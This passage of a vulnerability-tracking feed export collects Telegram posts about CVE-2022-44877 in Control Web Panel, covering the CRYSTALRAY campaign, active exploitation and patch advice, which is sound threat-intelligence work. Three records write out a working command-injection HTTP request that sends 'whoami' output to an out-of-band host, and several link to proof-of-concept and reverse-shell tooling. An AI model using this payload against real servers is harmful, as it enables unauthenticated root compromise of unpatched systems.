CVE-2022-44877 (\u043e\u0448\u0438\u0431\u043a\u0430 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0432 Control Web Panel (CWP), CVE-2021-3129 (RCE-\u043e\u0448\u0438\u0431\u043a\u0430 d Ignition (Laravel) \u0438 CVE-2019-18394 (SSRF-\u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Ignite Realtime Openfire).\n\nSysdig \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0430, \u0447\u0442\u043e \u0440\u0435\u0448\u0435\u043d\u0438\u044f Atlassian Confluence, \u0432\u0435\u0440\u043e\u044f\u0442\u043d\u043e, \u0442\u0430\u043a\u0436\u0435 \u043f\u043e\u0434\u0432\u0435\u0440\u0433\u0430\u044e\u0442\u0441\u044f \u0430\u0442\u0430\u043a\u0430\u043c, \u043e\u0441\u043d\u043e\u0432\u044b\u0432\u0430\u044f\u0441\u044c \u043d\u0430 \u043d\u0430\u0431\u043b\u044e\u0434\u0430\u0435\u043c\u044b\u0445 \u043c\u043e\u0434\u0435\u043b\u044f\u0445 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438, \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u0432 \u0445\u043e\u0434\u0435 \u043f\u043e\u043f\u044b\u0442\u043e\u043a \u0430\u0442\u0430\u043a \u043f\u0440\u043e\u0442\u0438\u0432 1800 IP-\u0430\u0434\u0440\u0435\u0441\u043e\u0432, \u0442\u0440\u0435\u0442\u044c \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 \u043d\u0430\u0445\u043e\u0434\u044f\u0442\u0441\u044f \u0432 \u0421\u0428\u0410.\n\nCRYSTALRAY \u0437\u0430\u0434\u0435\u0439\u0441\u0442\u0432\u0443\u0435\u0442 \u0432\u0435\u0431-\u043c\u0435\u043d\u0435\u0434\u0436\u0435\u0440 Platypus \u0434\u043b\u044f \u043e\u0431\u0440\u0430\u0431\u043e\u0442\u043a\u0438 \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u0438\u0445 \u0441\u0435\u0430\u043d\u0441\u043e\u0432 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0439 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u043d\u0430 \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c SSH-Snake \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u0435\u0442 \u043e\u0441\u0442\u0430\u0432\u0430\u0442\u044c\u0441\u044f \u043e\u0441\u043d\u043e\u0432\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c, \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 \u0447\u0435\u0440\u0435\u0437 \u0441\u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0435 \u0441\u0435\u0442\u0438. \u041f\u043e\u0441\u043b\u0435 \u043f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u044f \u043a\u043b\u044e\u0447\u0435\u0439 SSH \u0447\u0435\u0440\u0432\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0438\u0445 \u0434\u043b\u044f \u0432\u0445\u043e\u0434\u0430 \u0432 \u043d\u043e\u0432\u044b\u0435 \u0441\u0438\u0441\u0442\u0435\u043c\u044b, \u043a\u043e\u043f\u0438\u0440\u0443\u0435\u0442 \u0441\u0435\u0431\u044f \u0438 \u043f\u043e\u0432\u0442\u043e\u0440\u044f\u0435\u0442 \u043f\u0440\u043e\u0446\u0435\u0441\u0441 \u043d\u0430 \u043d\u043e\u0432\u044b\u0445 \u0445\u043e\u0441\u0442\u0430\u0445.\n\nSSH-Snake \u043d\u0435 \u0442\u043e\u043b\u044c\u043a\u043e \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u0442 \u0437\u0430\u0440\u0430\u0436\u0435\u043d\u0438\u0435, \u043d\u043e \u0438 \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u044f\u0435\u0442 \u0437\u0430\u0445\u0432\u0430\u0447\u0435\u043d\u043d\u044b\u0435 \u043a\u043b\u044e\u0447\u0438 \u0438 \u0438\u0441\u0442\u043e\u0440\u0438\u044e bash \u043e\u0431\u0440\u0430\u0442\u043d\u043e \u043d\u0430 C2 CRYSTALRAY, \u043f\u0440\u0435\u0434\u043e\u0441\u0442\u0430\u0432\u043b\u044f\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0431\u043e\u043b\u044c\u0448\u0435\u0439 \u0443\u043d\u0438\u0432\u0435\u0440\u0441\u0430\u043b\u044c\u043d\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a.\n\n\u0412\u0441\u0435 \u043a\u0440\u0430\u0434\u0435\u043d\u043d\u043e\u0435 \u0437\u0430\u0442\u0435\u043c \u0441 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432, \u043f\u043e\u0447\u0442\u043e\u0432\u044b\u0445 \u043f\u043b\u0430\u0442\u0444\u043e\u0440\u043c \u0438\u043b\u0438 \u0434\u0440\u0443\u0433\u0438\u0445 SaaS-\u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0440\u0430\u0441\u043f\u0440\u043e\u0434\u0430\u0435\u0442\u0441\u044f \u0432 \u0434\u0430\u0440\u043a\u043d\u0435\u0442\u0435 \u0438\u043b\u0438 Telegram, \u043f\u0440\u0438\u043d\u043e\u0441\u044f \u0445\u043e\u0440\u043e\u0448\u0443\u044e \u043f\u0440\u0438\u0431\u044b\u043b\u044c. \u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u0434\u043b\u044f \u043c\u043e\u043d\u0435\u0442\u0430\u0437\u0438\u0446\u0438\u0438 \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442\u0441\u044f \u043a\u0440\u0438\u043f\u0442\u043e\u043c\u0430\u0439\u043d\u0435\u0440\u044b.\n\n\u041f\u043e \u043c\u0435\u0440\u0435 \u0440\u043e\u0441\u0442\u0430 \u0443\u0433\u0440\u043e\u0437\u044b CRYSTALRAY \u043b\u0443\u0447\u0448\u0435\u0439 \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0435\u0439 \u0435\u0435 \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u044f \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043c\u0438\u043d\u0438\u043c\u0438\u0437\u0430\u0446\u0438\u044f \u043f\u043e\u0432\u0435\u0440\u0445\u043d\u043e\u0441\u0442\u0438 \u0430\u0442\u0430\u043a\u0438 \u043f\u043e\u0441\u0440\u0435\u0434\u0441\u0442\u0432\u043e\u043c \u0441\u0432\u043e\u0435\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0439 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0434\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e \u043c\u0435\u0440\u0435 \u0438\u0445 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f.", "creation_timestamp": "2024-07-12T17:35:05.000000Z"}, {"uuid": "d3dc6343-b881-4a1c-93e2-7cc57e669cf2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/true_secator/3934", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f CVE-2022-44877 \u0441 \u043e\u0446\u0435\u043d\u043a\u043e\u0439 \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u043e\u0441\u0442\u0438 9,8 \u0438\u0437 10, \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0430\u044f \u0432 Control Web Panel (\u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c \u043a\u0430\u043a CentOS Web Panel), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043a\u043e\u0434 \u0431\u0435\u0437 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442\u0441\u044f \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435.\n\n\u0412\u0435\u0431-\u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f, \u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u0430\u044f \u043a\u0430\u043a \u0432\u0435\u0431-\u043f\u0430\u043d\u0435\u043b\u044c CentOS, \u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u043f\u043e\u043f\u0443\u043b\u044f\u0440\u043d\u044b\u043c \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u043c \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u043e\u0432 \u0434\u043b\u044f \u043a\u043e\u0440\u043f\u043e\u0440\u0430\u0442\u0438\u0432\u043d\u044b\u0445 \u0441\u0438\u0441\u0442\u0435\u043c Linux.\n\n\u041e\u0448\u0438\u0431\u043a\u0430 \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u0435\u0442 \u0432\u0441\u0435 \u0432\u0435\u0440\u0441\u0438\u0438 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0433\u043e \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u044f \u0434\u043e 0.9.8.1147 \u0438 \u0431\u044b\u043b\u0430\u00a0\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0430\u00a0\u0435\u0435 \u0441\u043e\u043f\u0440\u043e\u0432\u043e\u0436\u0434\u0430\u044e\u0449\u0438\u043c\u0438 25 \u043e\u043a\u0442\u044f\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0435 \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u041e\u0421 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043c\u0435\u0442\u0430\u0441\u0438\u043c\u0432\u043e\u043b\u043e\u0432 \u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 \u0432 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0435 \u0432\u0445\u043e\u0434\u0430 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443.\n\n\u0421\u043e\u043e\u0431\u0449\u0438\u0432\u0448\u0438\u0439 \u043e \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0435 \u0432 \u043e\u043a\u0442\u044f\u0431\u0440\u0435 \u043f\u0440\u043e\u0448\u043b\u043e\u0433\u043e \u0433\u043e\u0434\u0430, \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u044c\u00a0\u041d\u0443\u043c\u0430\u043d \u0422\u044e\u0440\u043b\u0435\u00a0\u0438\u0437 Gais Cyber Security 3 \u044f\u043d\u0432\u0430\u0440\u044f \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b \u044d\u043a\u0441\u043f\u0435\u0440\u0438\u043c\u0435\u043d\u0442\u0430\u043b\u044c\u043d\u044b\u0439 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442 (PoC) \u0438 \u0434\u0435\u043c\u043e\u043d\u0441\u0442\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0439 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a, \u0430 \u0442\u0440\u0438 \u0434\u043d\u044f \u0441\u043f\u0443\u0441\u0442\u044f \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Shadowserver Foundation \u0438\u00a0GreyNoise \u0437\u0430\u043c\u0435\u0442\u0438\u043b\u0438, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u0438\u043d\u044f\u043b\u0438\u0441\u044c \u043a \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438.\n\n\u0412 Shadowserver \u0437\u0430\u044f\u0432\u0438\u043b\u0438, \u0447\u0442\u043e \u00ab\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0442\u0440\u0438\u0432\u0438\u0430\u043b\u044c\u043d\u0430\u00bb.\n\n\u041f\u043e \u0438\u0445 \u0434\u0430\u043d\u043d\u044b\u043c, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043d\u0430\u0445\u043e\u0434\u044f\u0442 \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0435 \u0445\u043e\u0441\u0442\u044b \u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442 CVE-2022-44877 \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0442\u0435\u0440\u043c\u0438\u043d\u0430\u043b\u0430 \u0434\u043b\u044f \u0432\u0437\u0430\u0438\u043c\u043e\u0434\u0435\u0439\u0441\u0442\u0432\u0438\u044f \u0441 \u043c\u0430\u0448\u0438\u043d\u043e\u0439. \u0414\u0440\u0443\u0433\u0438\u0435 \u0430\u0442\u0430\u043a\u0438 \u0431\u044b\u043b\u0438 \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u044b \u043d\u0430 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u044b\u0445 \u043c\u0430\u0448\u0438\u043d.\n\nGreyNoise \u0437\u0430\u044f\u0432\u0438\u043b\u0430, \u0447\u0442\u043e \u0438\u043c\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043e\u00a0\u0447\u0435\u0442\u044b\u0440\u0435 \u0443\u043d\u0438\u043a\u0430\u043b\u044c\u043d\u044b\u0445 IP-\u0430\u0434\u0440\u0435\u0441\u0430, \u043f\u044b\u0442\u0430\u044e\u0449\u0438\u0445\u0441\u044f \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c CVE-2022-44877, \u0434\u0432\u0430 \u0438\u0437 \u043a\u043e\u0442\u043e\u0440\u044b\u0445 - \u0432 \u0421\u0428\u0410 \u0438 \u043f\u043e \u043e\u0434\u043d\u043e\u043c\u0443 - \u0432 \u041d\u0438\u0434\u0435\u0440\u043b\u0430\u043d\u0434\u0430\u0445 \u0438 \u0422\u0430\u0438\u043b\u0430\u043d\u0434\u0435.\n\n\u041f\u0440\u0438 \u044d\u0442\u043e\u043c \u0432\u0441\u0435 \u043f\u043e\u043f\u044b\u0442\u043a\u0438 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438 \u043e\u0441\u043d\u043e\u0432\u0430\u043d\u044b \u043d\u0430 \u043e\u0440\u0438\u0433\u0438\u043d\u0430\u043b\u044c\u043d\u043e\u043c \u043e\u0431\u0449\u0435\u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u043c PoC, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0431\u044b\u043b \u0441\u043b\u0435\u0433\u043a\u0430 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d \u0434\u043b\u044f \u0440\u0435\u0448\u0435\u043d\u0438\u044f \u0437\u0430\u0434\u0430\u0447 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430.\n\n\u0412 \u0441\u0432\u044f\u0437\u0438 \u0441 \u0430\u043a\u0442\u0438\u0432\u043d\u043e\u0439 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0435\u0439 \u0432 \u0434\u0438\u043a\u043e\u0439 \u043f\u0440\u0438\u0440\u043e\u0434\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u043c, \u0430\u0434\u043c\u0438\u043d\u0438\u0441\u0442\u0440\u0430\u0442\u043e\u0440\u0430\u043c \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u043f\u0440\u0438\u043d\u044f\u0442\u044c \u043d\u0435\u0437\u0430\u043c\u0435\u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0435 \u043c\u0435\u0440\u044b \u0438 \u043e\u0431\u043d\u043e\u0432\u0438\u0442\u044c CWP \u0434\u043e\u00a0\u043f\u043e\u0441\u043b\u0435\u0434\u043d\u0435\u0439 \u0434\u043e\u0441\u0442\u0443\u043f\u043d\u043e\u0439 \u0432\u0435\u0440\u0441\u0438\u0438, \u0432 \u043d\u0430\u0441\u0442\u043e\u044f\u0449\u0435\u0435 \u0432\u0440\u0435\u043c\u044f 0.9.8.1148, \u0432\u044b\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 1 \u0434\u0435\u043a\u0430\u0431\u0440\u044f 2022 \u0433\u043e\u0434\u0430.", "creation_timestamp": "2023-01-13T10:46:05.000000Z"}, {"uuid": "2ab30568-ecf3-4eb9-90fe-fb8b979ca07c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/crackcodes/2143", "content": "#exploit\n1. The OWASSRF + TabShell exploit chain\nhttps://blog.viettelcybersecurity.com/tabshell-owassrf\n\n2. CVE-2022-3515/CVE-2022-47629:\nInteger overflow bug Libksba\u00a0library (x.509)\nhttps://github.com/elttam/publications/blob/master/writeups/CVE-2022-47629.md \n\n3. CVE-2022-44877:\nCentos Web Panel 7 Unauthenticated RCE\nhttps://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-15T13:34:14.000000Z"}, {"uuid": "5a9a1542-1eb5-453c-9202-3706adfcbfc0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "seen", "source": "https://t.me/cibsecurity/56025", "content": "\u203c CVE-2022-44877 \u203c\n\nRESERVED An issue in the /login/index.php component of Centos Web Panel 7 before v0.9.8.1147 allows unauthenticated attackers to execute arbitrary system commands via crafted HTTP requests.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2023-01-06T02:19:20.000000Z"}, {"uuid": "e0d7da86-fc83-4d2b-9f09-9f727cebdb67", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/xakep_ru/13470", "content": "\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432 Control Web Panel \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0434\u043b\u044f \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f \u0440\u0435\u0432\u0435\u0440\u0441-\u0448\u0435\u043b\u043b\u043e\u0432\n\n\u0418\u0411-\u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u044b \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0436\u0434\u0430\u044e\u0442, \u0447\u0442\u043e \u0445\u0430\u043a\u0435\u0440\u044b \u0430\u0442\u0430\u043a\u0443\u044e\u0442 \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2022-44877 (9,8 \u0431\u0430\u043b\u043b\u0430 \u0438\u0437 10 \u043f\u043e \u0448\u043a\u0430\u043b\u0435 CVSS), \u043d\u0435\u0434\u0430\u0432\u043d\u043e \u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0432 Control Web Panel (CWP), \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u0441\u0435\u0440\u0432\u0435\u0440\u0430\u043c\u0438, \u0440\u0430\u043d\u0435\u0435 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u043c \u043a\u0430\u043a CentOS Web Panel.\n\nhttps://xakep.ru/2023/01/13/cwp-attacks/", "creation_timestamp": "2023-01-13T21:10:31.000000Z"}, {"uuid": "401b0c18-3f23-44c5-9e6a-2a57ca910bcd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2637", "content": "#Red_Team\n\nRed Team utilities for setting up CWP CentOS 7 payload &amp; reverse shell, as it refers to CVE-2022-44877\n\nhttps://github.com/hotpotcookie/cwp-rce-white-box\n\n@BlueRedTeam", "creation_timestamp": "2023-03-30T08:15:53.000000Z"}, {"uuid": "dfd96818-318a-4fa9-adbb-def8cdd28555", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/thebugbountyhunter/6905", "content": "Centos Web Panel 7 Unauthenticated Remote Code Execution - CVE-2022-44877\n\nhttps://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-05T19:40:32.000000Z"}, {"uuid": "6aa2d8ea-2ca0-4741-914d-5ed6d556b6a5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/BugCod3/107", "content": "Control Web Panel Unauthenticated Remote Command Execution Exploit\n\n\u2796 Category: remote exploits\n\n\ud83d\udda5 Platform: linux\n\n\ud83e\ude96 Risk: Security Risk Critical \ud83d\udea8\n\n\ud83d\uddc2\ufe0f Size: \ud83c\udd70\ud83c\udd70\ud83c\udd70\ud83d\udcdd\ud83d\udcdd\n\n\ud83d\udcdd\nDescription: Control Web Panel versions prior to 0.9.8.1147 are vulnerable to unauthenticated OS command injection. Successful exploitation results in code execution as the root user. The results of the command are not contained within the HTTP response and the request will block while the command is running.\n\n\u2b50 CVE: CVE-2022-44877\n\n#CVE #Linux #Exploit\n\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\u2797\n\ud83d\udc64 T.me/MRvirusIRBOT \n\ud83d\udce2 T.me/SashClient\n\ud83e\udea9 Https://discord.gg/UfFvDYBBMM \n\ud83c\udf10 Https://sash.mybin.ir", "creation_timestamp": "2023-02-01T02:22:30.000000Z"}, {"uuid": "7f581f15-26c4-4d12-85d1-741f99cf46a3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/CNArsenal/392", "content": "CVE-2022-44877\nControl Web Panel Unauth RCE\n\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\n\n#exploit #poc", "creation_timestamp": "2024-08-20T17:04:34.000000Z"}, {"uuid": "d4ef0612-6793-49a0-b044-82af1d624153", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/398", "content": "", "creation_timestamp": "2023-01-15T09:51:24.000000Z"}, {"uuid": "1f85fca9-3b83-45d5-8ef5-68cb8faedde1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/CyberSecurityTechnologies/7503", "content": "#exploit\n1. CVE-2022-41076:\nThe OWASSRF + TabShell exploit chain\nhttps://blog.viettelcybersecurity.com/tabshell-owassrf\n]-&gt; https://gist.github.com/testanull/518871a2e2057caa2bc9c6ae6634103e\n\n2. CVE-2022-3515/CVE-2022-47629:\nInteger overflow bug Libksba\u00a0library (x.509)\nhttps://github.com/elttam/publications/blob/master/writeups/CVE-2022-47629.md \n\n3. CVE-2022-44877:\nCentos Web Panel 7 Unauthenticated RCE\nhttps://github.com/numanturle/CVE-2022-44877", "creation_timestamp": "2023-01-10T05:13:06.000000Z"}, {"uuid": "c47e660a-1d55-4cf8-ac04-f24e6294ff7d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/4535", "content": "CVE-2022-44877 \n\nCentos Web Panel 7 Unauthenticated Remote Code Execution \n\nGithub \n\n#rce\n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-17T00:38:49.000000Z"}, {"uuid": "8365f0cd-f70b-4f82-9a51-a17e2b81046b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "exploited", "source": "https://t.me/LearnExploit/4546", "content": "CVE-2022-44877\n\nControl Web Panel Unauth RCE\n\nusage :\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\n\n#RCE #CVE \n\u2014\u2014\u2014\u2014\u2014\u2014\u200c\n0Day.Today\n@LearnExploit\n@Tech_Army", "creation_timestamp": "2023-01-17T00:38:51.000000Z"}, {"uuid": "b2ea6888-ebd4-4ef4-80a5-6ef093a616fe", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-44877", "type": "published-proof-of-concept", "source": "https://t.me/LearnExploit/5153", "content": "CVE-2022-44877\n\nControl Web Panel Unauth RCE\n\nPOC usage:\n\nPOST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}whoami.{{interactsh-url}}) HTTP/1.1\nHost: vuln\nContent-Type: application/x-www-form-urlencoded\n\nusername=root&amp;password=toor&amp;commit=Login\n\n#Cve 